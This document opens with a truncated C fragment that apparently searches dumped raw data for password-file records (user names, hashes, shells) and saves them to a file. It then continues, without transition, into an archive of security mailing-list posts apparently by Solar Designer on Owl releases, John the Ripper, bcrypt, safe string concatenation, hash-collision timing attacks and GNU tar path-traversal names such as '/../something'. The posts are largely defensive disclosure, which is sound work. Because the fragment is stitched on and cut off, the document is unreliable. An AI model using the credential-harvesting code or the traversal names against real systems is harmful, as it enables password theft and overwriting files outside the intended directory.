#define Mi  (1024 * Ki)

#define DUMP_NAME   "dump"

#define DUMMY_NAME  "dummy"
#define DUMMY_SIZE  (128 * Mi)
#define SOCKET_BUF  (196 * Ki)

#define DUMMY_RAND_BITS 4
#define DUMMY_RAND_MASK ((1 << DUMMY_RAND_BITS) - 1)

#define MAX_LOGIN   16
#define MAX_GECOS   128
#define MAX_HOME128
#define MAX_SHELL   128

static char itoa64[64] =
"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

static int debug = 0, relaxed = 0;
static char buf[SOCKET_BUF];

static void pexit(char *what)
{
	perror(what);
	exit(1);
}

static void write_loop(int fd, char *buf, int count)
{
	int offset, block;

	offset = 0;
	while (count > 0) {
		block = write(fd, &buf[offset], count);
		if (block < 0) pexit("write");
		if (!block) {
			fprintf(stderr, "write: Returned 0\n");
			exit(1);
		}

		offset += block;
		count -= block;
	}
}

static void dump(char *buf, int count)
{
	static int fd = -1;

	if (fd < 0) {
		fd = creat(DUMP_NAME, S_IRUSR | S_IWUSR);
		if (fd < 0) pexit("creat");
	}
	write_loop(fd, buf, count);
}

static int nonzero(char *buf, int count)
{
	char *p, *end;

	p = buf;
	end = buf + count;
	while (p < end)
		if (*p++) return 1;

	return 0;
}

static int search(char *buf, int count)
{
	static char prevuser[MAX_LOGIN + 1], prevpass[61];
	char *p, *q, *end;
	int n;
	char *user, *pass, *gecos, *home, *shell;
	struct passwd *pw;
	int found = 0;

	p = buf;
	end = buf + count;
	while (p < end && (p = memchr(p, '/', end - p))) {
		q = p++;
		if (q < buf + (1+1+1+13+2+0+1+1+1)) continue;
		shell = q;
		n = 0;
		while (q < end && *q++ > ' ') n++;
		if (n < 2 || n > MAX_SHELL) continue;
		if (q >= end || *q != '\0') continue;

Openwall GNU/*/Linux 3.0 is out, marks 10 years of the project

2010-12-16 Thread Solar Designer
Hi,

I am pleased to announce that we have made a new major release of
Openwall GNU/*/Linux, version 3.0.  ISO images of the CDs for i686
and x86-64 are available for download via direct links from:

http://www.openwall.com/Owl/

The ISOs include a live system, installable packages, the installer
program, as well as full source code and the build environment.
The download size is under 450 MB (for one CPU architecture).

Additional components, such as OpenVZ container templates, are available
from the appropriate directories on the mirrors:

http://www.openwall.com/Owl/DOWNLOAD.shtml

Openwall GNU/*/Linux (or Owl for short) is a small security-enhanced
Linux distribution for servers, appliances, and virtual appliances.
Owl live CDs with remote SSH access are also good for recovering or
installing systems (whether with Owl or not).  Another secondary use is
for operating systems and/or computer security courses, which benefit
from the simple structure of Owl and from our inclusion of the complete
build environment.

This release marks roughly 10 years of our project - development started
in mid-2000, and Owl 0.1-prerelease was made public in 2001.  Curiously,
most other "secure" Linux distros that appeared at about the same time
are no longer around.  (EnGarde Secure Linux appears to be the only
exception, but it is completely different both in approach to security
and in functionality.)

With the 3.0 release, the Owl 2.0-stable branch is formally discontinued.
We intend to proceed with further development under Owl-current and to
maintain the newly-created Owl 3.0-stable branch until the next release,
as usual.  (Owl 3.0-stable will be made available as soon as it starts
to differ from the 3.0 release.)

Here's how upgrades from Owl 2.0-release, 2.0-stable, or from pre-3.0
Owl-current to Owl 3.0 may be performed:

http://openwall.info/wiki/Owl/upgrade

(To upgrade from an even older version of Owl, you need to upgrade to
Owl 2.0-release in the same fashion first.)

Many of the enhancements since Owl 2.0 are documented in the change log:

http://www.openwall.com/Owl/CHANGES-3.0.shtml

They include:

- x86-64 support;
- move to RHEL 5.5-like Linux 2.6 kernels (with additional changes);
- kernel in an RPM package designed to allow for easy non-RPM'ed
kernel builds as well (optional);
- integrated OpenVZ container-based virtualization support (optional);
- "make iso" and "make vztemplate" targets in the build environment
(to easily generate new Owl CD images and OpenVZ container templates);
- ext4 filesystem support (in fact, Owl 3.0's installer offers ext4 by
default, with ext3 and ext2 still available as options);
- xz compression support (LZMA, LZMA2) throughout the system (not only
xz* commands, but also support in tar, rpm, less, color ls output);
- a few new packages (smartmontools, mdadm, cdrkit, pciutils, dmidecode,
vzctl, vzquota, xz);
- lots of package updates;
- improved hardware compatibility and more intuitive installation process;
- credentials logging in syslogd (the sender's UID and PID are logged
unless the sender is root);
- key blacklisting support in OpenSSH;
- and many other enhancements and corrections.

A curious detail is that there are no SUID programs in a default install
of Owl 3.0.  Instead, there are some SGID programs, whose group-level
access, if compromised via a vulnerability, can't be expanded into
root access without finding and exploiting another vulnerability in
another part of the system - e.g., a vulnerability in crontab(1) or
at(1) can't result in a root compromise without a vulnerability in
crond(8) or in a critical system component relied upon by crond(8).

Feedback is welcome via the owl-users mailing list.  Specifically, you
may use this opportunity to vote for changes to make and features to
implement during post-3.0 development leading up to the next release.

Enjoy!

Alexander

P.S. John the Ripper achieves over 50M c/s at cracking DES-based
crypt(3) on a quad-X7550 machine (32 cores, 64 logical CPUs), with one
of the OpenMP patches:

http://openwall.info/wiki/john/benchmarks
http://openwall.info/wiki/john/patches

It also achieves over 20M c/s on a more humble dual-X5460 machine
(8 cores, 8 logical CPUs), cracking 400k passwords from Gawker:

http://www.duosecurity.com/blog/entry/brief_analysis_of_the_gawker_password_dump

Oh, and there's a new OpenMP-enabled build for Mac OS X here:

http://www.openwall.com/john/#contrib
http://download.openwall.net/pub/projects/john/contrib/macosx/

This one is by Erik Winkler, as usual.

I just thought you might enjoy these items too. ;-)


Re: [R7-0035] VxWorks Authentication Library Weak Password Hashing

2010-08-03 Thread Solar Designer
On Mon, Aug 02, 2010 at 11:55:05PM -0400, HD Moore wrote:
> -- Vendor Response:
> Wind River Systems has notified their customers of the issue and
> suggested that each downstream vendor replace the existing hash
> implementation with SHA512 or SHA256.

Like, without salting and stretching/strengthening?  That's not the best
suggestion.  I try to explain this without going into too much detail here:

http://www.openwall.com/articles/PHP-Users-Passwords#salting

At this time, vendors should implement either bcrypt (Blowfish-based):

http://www.openwall.com/crypt/

or SHA-crypt (usually its SHA-512 based variant, because that
makes better use of 64-bit CPUs):

http://www.akkadia.org/drepper/sha-crypt.html

There's almost no security difference between these two.  Both should
be replaced with something even better eventually - along the lines of
scrypt (adding more parallelism and configurable memory cost) - but
we're not ready for that yet (no peer-reviewed and agreed upon
implementation to recommend to vendors, even though some ideas in this
area have been floating around since the 1990s).

Alexander


Re: [oss-security] [oCERT-2010-001] multiple http client unexpected download filename vulnerability

2010-06-11 Thread Solar Designer
Hi,

Here's a summary of relevant postings to oss-security and bug-wget.

Unofficial patch for wget, by Florian Weimer:
http://www.openwall.com/lists/oss-security/2010/05/17/2

PoC attack on a wget cron job resulting in a .bash_profile overwrite:
http://www.openwall.com/lists/oss-security/2010/05/18/13

Brief description of an attack on a wget cron job not involving a
dot-file nor a home directory (but involving a website tree instead):
http://lists.gnu.org/archive/html/bug-wget/2010-05/msg00032.html

Advice on back-porting lftp's fix to versions 3.4.7 through 4.0.5:
http://www.openwall.com/lists/oss-security/2010/05/20/2
http://www.openwall.com/lists/oss-security/2010/06/10/1

On Wed, Jun 09, 2010 at 06:16:39PM +0200, Marcus Meissner wrote:
> Did anyone assign CVE ids for these?

Marcus' reminder has resulted in the following CVE assignments:

CVE-2010-2251 - lftp
CVE-2010-2252 - wget
CVE-2010-2253 - libwww-perl as used in lwp-download

Alexander


key blacklisting & file size (was: OpenID/Debian PRNG/DNS Cache poisoning advisory)

2008-08-08 Thread Solar Designer
On Fri, Aug 08, 2008 at 11:20:15AM -0700, Eric Rescorla wrote:
> Why do you say a couple of megabytes? 99% of the value would be
> 1024-bit RSA keys. There are ~32,000 such keys. If you devote an
> 80-bit hash to each one (which is easily large enough to give you a
> vanishingly small false positive probability; you could probably get
> away with 64 bits), that's 320KB.

Regarding blacklist file size, we (Openwall and ALT Linux, with support
from CivicActions) have done some work on SSH key blacklisting, and our
encoding scheme should be reusable for SSL as well.  Our default
blacklist file contains 48-bit partial fingerprints for 1024-bit and
2048-bit RSA and 1024-bit DSA keys for PID range 1 to 32767 (a total of
almost 300k keys).  The installed file size is just 1.3 MB, which
corresponds to less than 4.5 bytes per fingerprint, and the .bz2 (and
.rpm) is just 1.2 MB.  (Naturally, with non-compressing binary encoding
the 48-bit fingerprints would be 6 bytes each.)

Lookups are very quick, and only three small portions of the file are
read per lookup, for a total of under 100 bytes of data to read (as far
as sshd is concerned).

Neither the code nor the file format is specific to 48-bit partial
fingerprints; it is possible to use larger ones by supplying something
other than "6" (the size in bytes) on blacklist-encode's command-line.

This code is currently in use in Openwall GNU/*/Linux (Owl) and ALT Linux
distributions, and it has successfully caught some weak SSH keys in the
wild.  Other systems/projects/whatever are more than welcome to reuse
the code or the encoding scheme.
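Purely as an illustration of why lookups over sorted fixed-size partial
fingerprints are quick, here is a sketch using raw 6-byte records and
binary search.  The record layout and the function name are mine, not
the Openwall blacklist format (which, as described above, uses a
compressed encoding rather than raw records):

```c
#include <string.h>

#define FP_BYTES 6	/* 48-bit partial fingerprint */

/* Binary search for a 6-byte partial fingerprint in a sorted array of
 * fixed-size records.  Returns 1 if found, 0 otherwise.  Illustrative
 * only: the real blacklist file uses a compressed encoding. */
int fp_blacklisted(const unsigned char *table, unsigned long count,
    const unsigned char *fp)
{
	unsigned long lo = 0, hi = count;

	while (lo < hi) {
		unsigned long mid = lo + (hi - lo) / 2;
		int cmp = memcmp(table + mid * FP_BYTES, fp, FP_BYTES);
		if (cmp == 0)
			return 1;
		if (cmp < 0)
			lo = mid + 1;
		else
			hi = mid;
	}
	return 0;
}
```

Even for hundreds of thousands of keys, such a search touches only a
logarithmic number of records, which is consistent with the small
per-lookup read volume described above.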

My original announcement on oss-security:

http://www.openwall.com/lists/oss-security/2008/05/27/3

Dmitry V. Levin's follow-up with URL for forward-port of the patch to
newer OpenSSH:

http://www.openwall.com/lists/oss-security/2008/05/27/4

-- 
Alexander Peslyak 
GPG key ID: 5B341F15  fp: B3FB 63F4 D7A3 BCCC 6F6E  FC55 A2FC 027C 5B34 1F15
http://www.openwall.com - bringing security into open computing environments


safely concatenating strings in portable C (Re: GnuPG 1.4 and 2.0 buffer overflow)

2006-11-30 Thread Solar Designer
On Mon, Nov 27, 2006 at 06:13:02PM +0100, Werner Koch wrote:
> +n = strlen(s) + (defname?strlen (defname):0) + 10;
>  prompt = xmalloc(n);
>  if( defname )
> sprintf(prompt, "%s [%s]: ", s, defname );
...
> Note, that using snprintf would not have helped in
> this case.  How I wish C-90 had introduced asprintf or at least it
> would be available on more platforms.

Actually, if you dare to use snprintf() (either because you don't need
your code to be portable to platforms that lack snprintf() or because
you provide an implementation along with your application), then
implementing asprintf() on top of snprintf() is fairly easy (although
you do need to consider both snprintf() return value conventions).
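To make the point about the two return-value conventions concrete, here
is a minimal sketch of an asprintf()-style wrapper on top of vsnprintf().
The function name my_asprintf() is mine; the sketch assumes vsnprintf()
is available, and handles both the C99 convention (the needed length is
returned) and the older one (-1 is returned on truncation):

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

/* Sketch of asprintf() on top of vsnprintf(), handling both return
 * value conventions: C99 vsnprintf() returns the length that would
 * have been written, while some older implementations return -1 (or
 * the truncated length) when the buffer is too small. */
int my_asprintf(char **result, const char *fmt, ...)
{
	va_list args;
	char *buf;
	size_t size = 64;
	int n;

	*result = NULL;
	while (1) {
		if (!(buf = malloc(size)))
			return -1;
		va_start(args, fmt);
		n = vsnprintf(buf, size, fmt, args);
		va_end(args);
		if (n >= 0 && (size_t)n < size) {
			*result = buf;
			return n;
		}
		free(buf);
		/* C99: n is the required length; pre-C99: double and retry */
		size = (n >= 0) ? (size_t)n + 1 : size * 2;
	}
}
```

Note that va_start()/va_end() are re-issued on each retry, since a
va_list may not be reused after being consumed by vsnprintf().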

However, in those (most common) cases when all you need is to concatenate
strings, relying on or providing an snprintf() implementation might be
an overkill.  For that reason, I wrote a trivial concat() function (for
popa3d) that should be much easier to audit than a full-blown *printf().
Please feel free to reuse it in any applications with no need to even
credit me (consider it hereby placed in the public domain, or you may
use it under the terms of the popa3d LICENSE).

The usage of concat() is as follows:

prompt = concat(s, " [", defname, "]: ", NULL);

You may also define an xconcat() (that would exit the program if the
allocation fails).

The code may be found here:


http://cvsweb.openwall.com/cgi/cvsweb.cgi/Owl/packages/popa3d/popa3d/misc.c?rev=HEAD

(it's the last function currently defined in that source file), or here
is the current revision:

#include <stdarg.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>

char *concat(char *s1, ...)
{
	va_list args;
	char *s, *p, *result;
	unsigned long l, m, n;

	/* First pass: compute the total length, detecting wraparound */
	m = n = strlen(s1);
	va_start(args, s1);
	while ((s = va_arg(args, char *))) {
		l = strlen(s);
		if ((m += l) < l) break;
	}
	va_end(args);
	if (s || m >= INT_MAX) return NULL;

	result = malloc(m + 1);
	if (!result) return NULL;

	/* Second pass: copy, re-checking against the first pass */
	memcpy(p = result, s1, n);
	p += n;
	va_start(args, s1);
	while ((s = va_arg(args, char *))) {
		l = strlen(s);
		if ((n += l) < l || n > m) break;
		memcpy(p, s, l);
		p += l;
	}
	va_end(args);
	if (s || m != n || p - result != n) {
		free(result);
		return NULL;
	}

	*p = 0;
	return result;
}

-- 
Alexander Peslyak 
GPG key ID: 5B341F15  fp: B3FB 63F4 D7A3 BCCC 6F6E  FC55 A2FC 027C 5B34 1F15
http://www.openwall.com - bringing security into open computing environments


Openwall GNU/*/Linux (Owl) 2.0 release

2006-02-16 Thread Solar Designer
Hi,

For those few who don't know yet, Openwall GNU/*/Linux (or Owl) is a
security-enhanced operating system with Linux and GNU software as its
core, intended as a server platform.  More detailed information is
available on the web site:

http://www.openwall.com/Owl/

After many Owl-current snapshots, Owl 2.0 release is finally out.  The
major changes made since Owl 1.1 are documented:

http://www.openwall.com/Owl/CHANGES-2.0.shtml

Owl 2.0 is built around Linux kernel 2.4.32-ow1, glibc 2.3.6 (with our
security enhancements), gcc 3.4.5, and recent versions of over 100 other
packages.  It offers binary- and package-level compatibility for most
packages intended for Red Hat Enterprise Linux 4 (RHEL4) and Fedora Core 3
(FC3), as well as for many FC4 packages.

Additionally, Owl 2.0 uses our new installer, making installation a lot
easier than it used to be for Owl 1.1 and below.

The new release (including an ISO-9660 image for the CD) can be freely
downloaded from our FTP mirrors:

http://www.openwall.com/Owl/DOWNLOAD.shtml

or it can be ordered on a CD with delivery worldwide:

http://www.openwall.com/Owl/orders.shtml

Of course, we prefer the latter, but it's your choice.  Similarly, you
may choose to pay just what it costs to get the CD to you, or you may
also support our project.

Owl CDs are bootable on x86 and include a live system, x86 binary
packages for installation to a hard drive, and full source code which
may be rebuilt with one simple command ("make buildworld").

Owl 2.0 binary packages for SPARC and Alpha (EV56+) are available via
the FTP mirrors only.

PGP-signed mtree(8) specifications for all of the above are available
via FTP and in the root directory of Owl CDs (such that you don't even
have to blindly trust CDs you receive in the mail).

The 1.1-stable branch is now officially unsupported, in favor of the
2.0 release and its corresponding stable branch.  Owl 2.0-stable already
exists in the CVS repository and will also be made available via FTP
once the need arises (that is, once an important post-release fix is
applied).

-- 
Alexander Peslyak 
GPG key ID: B35D3598  fp: 6429 0D7E F130 C13E C929  6447 73C3 A290 B35D 3598
http://www.openwall.com - bringing security into open computing environments


Re: John the Ripper 1.7; pam_passwdqc 1.0+; tcb 1.0; phpass 0.0

2006-02-10 Thread Solar Designer
On Thu, Feb 09, 2006 at 03:44:25PM -0500, Amin Tora wrote:
> Can a tool as this be as useful when there are rainbow tables out there
> to utilize for this kind of cracking? 

For salted hashes (such as of Unix passwords), definitely yes.  In fact,
I am not aware of rainbow table implementations for salted hashes,
although this is (barely) feasible for the obsolete/traditional crypt(3)
(but not for the newer flavors).
 
For saltless hashes (such as Windows LM hashes), it depends.  Is the
goal to get everything cracked, or is it to detect and eliminate
passwords that would be too weak to withstand certain attacks (e.g.,
automated remote login attempts)?  All LM hashes are crackable anyway.
(John the Ripper 1.7 can exhaustively search the entire printable
US-ASCII keyspace against any number of LM hashes within a couple of
weeks on a single modern CPU.)

When cracking large numbers of hashes at once, John the Ripper may
actually be faster than rainbow tables based crackers, -- and it will
also get the weakest passwords cracked earlier because it tries
candidate passwords in an optimal order.

Finally, often it is preferable to not spend lots of disk space and lots
of time and/or bandwidth to generate or download rainbow tables, -- and
also to not reveal your password hashes to a third party (such as one of
the online rainbow tables based cracking services).

Perhaps other Bugtraqers can provide additional reasons in favor of
either approach.

-- 
Alexander Peslyak 
GPG key ID: B35D3598  fp: 6429 0D7E F130 C13E C929  6447 73C3 A290 B35D 3598
http://www.openwall.com - bringing security into open computing environments

Was I helpful?  Please give your feedback here: http://rate.affero.net/solar


John the Ripper 1.7; pam_passwdqc 1.0+; tcb 1.0; phpass 0.0

2006-02-09 Thread Solar Designer
Hi,

This is to announce several related items at once. :-)

After 7+ years of development snapshots only (yes, I know, that was
wrong), John the Ripper 1.7 release is out:

http://www.openwall.com/john/

John the Ripper is a fast password cracker, currently available for
many flavors of Unix (11 are officially supported, not counting
different architectures), DOS, Win32, BeOS, and OpenVMS (the latter
with a patch or unofficial builds by Jean-loup Gailly).  Its primary
purpose is to detect weak Unix passwords.  Besides several crypt(3)
password hash types most commonly found on various Unix flavors,
supported out of the box are Kerberos/AFS and Windows NT/2000/XP LM
hashes, plus many more with contributed patches.

The changes made since the last development snapshot (1.6.40) are minor,
however the changes made since 1.6 are substantial:

http://www.openwall.com/john/doc/CHANGES.shtml

John the Ripper became a lot faster, primarily at DES-based hashes.
This is possible due to the use of better algorithms (bringing more
inherent parallelism of trying multiple candidate passwords down to
processor instruction level), better optimized code, and new hardware
capabilities (such as AltiVec available on PowerPC G4 and G5 processors).

In particular, John the Ripper 1.7 is a lot faster at Windows LM hashes
than version 1.6 used to be.  John's "raw" performance at LM hashes is
now similar to or even slightly better than that of commercial Windows
password crackers such as LC5, -- and that's despite John trying
candidate passwords in a more sophisticated order based on statistical
information (resulting in typical passwords getting cracked earlier).

John 1.7 also improves on the use of MMX on x86 and starts to use
AltiVec on PowerPC processors when cracking DES-based hashes (that
is, both Unix crypt(3) and Windows LM hashes).  To my knowledge, John
1.7 (or rather, one of the development snapshots leading to this
release) is the first program to cross the 1 million Unix crypts per
second boundary on a general-purpose CPU.  John 1.7 achieves up to
1.6M c/s raw performance (with no matching salts) on a PowerPC G5 at
2.7 GHz (or 1.1M c/s on a 1.8 GHz) and approaches 1M c/s on the fastest
x86 CPUs currently available.

Additionally, John 1.7 makes an attempt at generic vectorization support
for bitslice DES (would anyone try to set DES_BS_VECTOR high and compile
this on a real vector computer, with compiler vectorizations enabled?),
will do two MD5 hashes at a time on RISC architectures (with mixed
instructions, allowing more instructions to be issued each cycle), and
includes some Blowfish x86 assembly code optimizations for older x86
processors (Intel PPro through P3 and AMD K6) with no impact on newer
ones due to runtime CPU type detection.

Speaking of the actual features, John the Ripper 1.7 adds an event
logging framework (John will now log how it proceeds through stages of
each of its cracking modes - word mangling rules being tried, etc.),
better idle priority emulation with POSIX scheduling calls (once
enabled, this almost eliminates any impact John has on performance of
other applications on the system), system-wide installation support for
use by *BSD ports and Linux distributions, and support for AIX,
DU/Tru64 C2, and HP-UX tcb files in the "unshadow" utility.

Finally, there are plenty of added pre-configured make targets with
optimal settings, including for popular platforms such as Linux/x86-64,
Linux/PowerPC (including ppc64 and AltiVec), Mac OS X (PowerPC and x86),
Solaris/sparc64, OpenBSD on almost anything 32-bit and 64-bit, and more.

On a related note, pam_passwdqc and our tcb suite became mature enough
for their 1.0 releases.

pam_passwdqc is a simple password strength checking module for PAM-aware
password changing programs, such as passwd(1).  In addition to checking
regular passwords, it offers support for passphrases and can provide
randomly generated ones.  All features are optional and can be
(re-)configured without rebuilding.

pam_passwdqc works on Linux, FreeBSD 5+ (in fact, it's been integrated
into FreeBSD), Solaris, HP-UX 11+, and reportedly on recent versions of
IRIX.  Additionally, Damien Miller has developed and contributed a
plugin password strength checker for OpenBSD based on pam_passwdqc.
This plugin is now linked from the contributed resources list on the
pam_passwdqc homepage:

http://www.openwall.com/passwdqc/

The tcb package contains core components of our tcb suite implementing
the alternative password shadowing scheme on Openwall GNU/*/Linux and
distributions by ALT Linux team.  This allows core system utilities such
as passwd(1) to operate with little privilege, eliminating the need for
SUID to root programs.  The tcb suite has been in production use for
some years and has proven to work well.  Its homepage is:

http://www.openwall.com/tcb/

The tcb suite has been designed and implemented primarily by Rafal Wojtczuk,
with significant contri

crypt_blowfish 1.0

2006-02-07 Thread Solar Designer
Hi,

This is to announce the first mature version of crypt_blowfish and the
minor security fix that this version adds.

crypt_blowfish is a public domain implementation of a modern password
hashing algorithm based on the Blowfish block cipher, provided via the
crypt(3) and a reentrant interface.  It is compatible with bcrypt
(version 2a) by Niels Provos and David Mazieres, as used in OpenBSD.
The homepage for crypt_blowfish is:

http://www.openwall.com/crypt/

The most important property of bcrypt (and thus crypt_blowfish) is that
it is adaptable to future processor performance improvements, allowing
you to arbitrarily increase the processing cost of checking a password
while still maintaining compatibility with your older password hashes.
Already now bcrypt hashes you would use are several orders of magnitude
stronger than traditional Unix DES-based or FreeBSD-style MD5-based
hashes.

Besides providing a bcrypt implementation, the crypt_blowfish package
also includes a generic password hashing framework and hooks for
introducing this framework into the GNU C Library.  The provided
functions include crypt_gensalt*(), a family of functions for generating
"salts" for use with common Unix password hashing methods (that is, not
only with bcrypt).

Marko Kreen has discovered and reported a minor security bug in
crypt_blowfish 0.4.7 and below.  The bug affected the way salts for
BSDI-style extended DES-based and for FreeBSD-style MD5-based password
hashes were generated with the crypt_gensalt*() functions.  It would
result in a higher than expected number of matching salts with large
numbers of password hashes of the affected types.  crypt_gensalt*()'s
functionality for Blowfish-based (bcrypt) hashes that crypt_blowfish
itself implements and for traditional DES-based crypt(3) hashes was not
affected.

Since bcrypt hashes were not affected, default installs of
Openwall GNU/*/Linux (Owl) were never affected either.  The specific
impact this could have on non-default installs of Owl is described in
the latest Owl-current change log entry for glibc:

http://www.openwall.com/Owl/CHANGES-2.0.shtml

Since Owl 2.0 is scheduled to be released really soon and since the bug
is minor, we are not planning a similar glibc update for Owl 1.1-stable.
Instead, the 1.1-stable branch will be obsoleted by the new release.

For those curious about the nature of the bug, it was unintended sign
extension on a typecast.

As this crypt_blowfish bug is my own, and as I was well aware of this
pitfall and avoided it in other places, I am very embarrassed about
this.  I apologize to anyone who might be affected for the exposure and
inconvenience this causes.

-- 
Alexander Peslyak 
GPG key ID: B35D3598  fp: 6429 0D7E F130 C13E C929  6447 73C3 A290 B35D 3598
http://www.openwall.com - bringing security into open computing environments


Re: Algorimic Complexity Attacks

2003-06-02 Thread Solar Designer
On Thu, May 29, 2003 at 03:33:06PM -0500, Scott A Crosby wrote:
> They exploit the difference between 'typical case' behavior versus
> worst-case behavior. For instance, in a hash table, the performance is
> usually O(1) for all operations. However in an adversarial
> environment, the attacker constructs carefully chosen input such that
> large number of 'hash collisions' occur.

This is precisely one of the attacks which have been considered,
avoided(*), and documented in my Phrack #53 article entitled "Designing
and Attacking Port Scan Detection Tools" - "Data Structures and
Algorithm Choice" back in 1998.  Now you report another port scan
detector (Bro) still vulnerable to this attack.  I'm not surprised.

(*) http://www.openwall.com/scanlogd/

As for solutions, while using a keyed hash function offers the best
performance with a large enough number of entries (but not with a
small one!), it is rather complicated when done right, too easy to do
wrong, and may be imperfect anyway because of timing leaks (see
below).  It requires that a cryptographically random secret is used
(and really kept secret!), that it is large enough to not be
successfully brute-forced, and a cryptographic hash function is used
(or it might be possible to infer the secret).  This is why a hashing
library like yours is needed.  But for many applications it could make
more sense to use another data structure and algorithm (such as binary
search).
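To show where the secret enters such a scheme, here is a minimal sketch
of keying a hash table's bucket function with a per-process secret.  The
FNV-1a-style mixing shown is deliberately simple and does *not* meet the
"cryptographic hash function" requirement stated above; it only
illustrates the structure, and the names are mine:

```c
#include <stddef.h>
#include <stdint.h>

/* Sketch: a bucket index derived from the key *and* a secret.  A real
 * implementation must use a cryptographic keyed hash and a secret that
 * is random, large enough, and actually kept secret, per the caveats
 * in the text; the mixing below is illustrative only. */
static uint64_t hash_secret;	/* set from a strong randomness source */

size_t keyed_bucket(const unsigned char *key, size_t len, size_t nbuckets)
{
	uint64_t h = 14695981039346656037ULL ^ hash_secret;
	size_t i;

	for (i = 0; i < len; i++) {
		h ^= key[i];
		h *= 1099511628211ULL;
	}
	return (size_t)(h % nbuckets);
}
```

With a weak mixing function like this one, an attacker who can observe
collisions may still recover enough of the secret to mount the attack
described below, which is exactly why the cryptographic requirements
above matter.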

Now the promised attack on using a keyed hash function with the above
requirements met.  Let's assume that all input to the hash function,
except for the secret, is under control of an attacker.  Further,
let's assume that she is able to infer if a hash collision occurs by
measuring the time it takes to process a request (possibly repeating
each request multiple times).  After a bit of trying, she will know
that inputs A and B produce a collision.  She will then keep A and B
fixed and search for an input C which will collide with A and B.  And
so on.

Changing the secret once in a while reduces this attack and may well
make it impractical with many particular applications.  Note that one
doesn't have to use any additional true randomness (and possibly
exhaust the randomness pool) for each new secret to be used with the
keyed hash.  If the secret itself is not leaked in the attack (and it
shouldn't be), something as simple as secret++ could suffice.
However, this does have its difficulty: maintaining existing entries.

-- 
Alexander Peslyak <[EMAIL PROTECTED]>
GPG key ID: B35D3598  fp: 6429 0D7E F130 C13E C929  6447 73C3 A290 B35D 3598
http://www.openwall.com - bringing security into open computing environments


Re: d_path() truncating excessive long path name vulnerability

2002-11-28 Thread Solar Designer
On Wed, Nov 27, 2002 at 01:04:04PM +1100, Paul Szabo wrote:
> Back in March 2002, Wojciech Purczynski <[EMAIL PROTECTED]> wrote (original
> article at http://online.securityfocus.com/archive/1/264117 ):
> 
> > Name:   Linux kernel
> > Version:up to 2.2.20 and 2.4.18
> > ...
> > In case of excessively long path names d_path kernel internal function
> > returns truncated trailing components of a path name instead of an error
> > value. As this function is called by getcwd(2) system call and
> > do_proc_readlink() function, false information may be returned to
> > user-space processes.
> 
> The problem is still present in Debian 2.4.19 kernel. I have not tried 2.5,
> but see nothing relevant in the Changelogs at http://www.kernel.org/ .

FWIW, I've included a workaround for this (covering the getcwd(2) case
only, not other uses of d_path() by the kernel or modules) in 2.2.21-ow1
patch and it went into 2.2.22 release in September.

This kind of proves the need for double-checking newer kernel branches
(2.4.x and 2.5.x currently) for fixes that should also go into what
many consider stable kernels.

-- 
/sd



Openwall GNU/*/Linux (Owl) 1.0 release

2002-10-16 Thread Solar Designer

Hi,

For those who don't know yet, Openwall GNU/*/Linux (or Owl) is a
security-enhanced operating system with Linux and GNU software as its
core, intended as a server platform.  And, of course, it's free.  More
detailed information is available on the web site:

http://www.openwall.com/Owl/

After over a year of development and many public Owl-current
snapshots, we're pleased to announce that Owl 1.0 is finally out.

The major changes made since 0.1-prerelease are documented:

http://www.openwall.com/Owl/CHANGES-1.0.shtml

The release may be freely downloaded from our FTP mirrors or ordered
on a CD.  Of course, we prefer the latter, but it's your choice.
Similarly, you may choose to pay just what it costs to get the CD to
you, or you may also support our project.

CDs (and ISO-9660 images available via the FTP mirrors) are bootable
on x86 and include a live system and x86 binary packages, as well as
full source code which may be rebuilt with one simple command ("make
buildworld").  Security tools such as John the Ripper are usable right
off the CD, without requiring a hard disk -- this way Owl may also be
considered an alternative to Trinux.

Currently available via the FTP mirrors only are the Owl 1.0 binary
packages for SPARC and Alpha architectures.

PGP-signed mtree(8) specifications for all of the above are available
via FTP and in the root directory of Owl CDs (such that you don't even
have to blindly trust CDs arriving via mail).

The 0.1-stable branch is now officially unsupported, in favor of the
1.0 release and its corresponding stable branch.  The change logs for
0.1-stable (which include security fix information) are no longer on
the web site, however 0.1-stable is still available on the FTP mirrors
(for reference only) and will of course remain available via anoncvs.

Owl 1.0-stable already exists in the CVS (in fact, it's been started
prior to the 1.0 release this time) and will also be made available
via FTP once the need arises (that is, a critical post-release fix is
applied).

Development will continue primarily in Owl-current, although we might
make another release based on 1.0-stable as well.

-- 
/sd



GNU tar (Re: Allot Netenforcer problems, GNU TAR flaw)

2002-10-09 Thread Solar Designer

On Fri, Sep 27, 2002 at 02:11:07AM +0200, Bencsath Boldizsar wrote:
> 2. Description of the "tar" problem
>
> Creating a tar file with -P option one can put any file names in the tar
> file. While unpacking such tar files, tar is designed to remove leading
> slash. Other security feature of the tar package is to deny deployment of
> any files whose name contains "dotdot" (".."). A bug in the tar package
> leads to a security flaw:
> "../something" is denied by tar
> "/something" leading slash is removed
> "/../something"  leading slash removed but ".." is NOT denied
> "./../something" ".." is NOT denied.
>
> Although we found this bug by studying tar, we found that this bug has
> been found by others, we should give them credit:

I believe 3APA3A was first to post this to Bugtraq last year:

http://marc.theaimsgroup.com/?l=bugtraq&m=99496364810666

At least 1.13.17 and 1.13.18 are known to get the contains_dot_dot()
function right; some older versions didn't have it at all.  1.13.19
introduced a bug which broke the check, and it's still not fixed in
1.13.25.

There's another related problem where tar could be made to follow a
symlink it just extracted and place a file outside of the intended
directory tree, pointed out on Bugtraq by Willy TARREAU in 1998:

http://marc.theaimsgroup.com/?l=bugtraq&m=90674255917321

Paul Eggert included a fix for it in 1.13.18:

"2000-10-23

...Extract potentially dangerous symbolic links more carefully,
deferring their creation until the end, and using a regular file
placeholder in the meantime."

However, he later broke it with a typo (reversed check) in 1.13.19.
1.13.25 has that check fixed again.

I've now fixed these two bugs, and a third (non-security) bug that
1.13.19 introduced, in the Owl package, with proper credit to you and
others involved, in both the package and the system-wide change log:

http://www.openwall.com/Owl/CHANGES.shtml

Although the two security bugs are now fixed, please keep in mind that
tar has traditionally been intended for making and extracting tape
backups rather than archives obtained from untrusted sources.  Be very
careful with what input you pass it and what user you run it as.

I've attached the two security patches to this message.  The dot-dot
patch is valid for 1.13.19 through 1.13.25; the symlink patch is needed
for 1.13.19 and possibly some versions after it, but not 1.13.25.  Other
patches that we use may be obtained via:

cvs -z3 -d :pserver:anoncvs:[EMAIL PROTECTED]:/cvs co Owl/packages/tar

or:

